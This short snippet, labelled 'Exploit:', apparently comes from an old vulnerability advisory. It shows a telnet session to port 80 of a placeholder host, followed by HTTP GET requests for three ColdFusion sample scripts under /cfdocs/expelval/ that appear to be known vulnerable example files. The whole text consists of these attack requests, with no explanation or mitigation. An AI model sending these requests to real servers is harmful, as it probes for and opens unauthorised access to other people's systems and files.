Exploit:

 telnet target.machine.com 80

  GET /cfdocs/expelval/openfile.cfm HTTP/1.0
  GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0
  GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0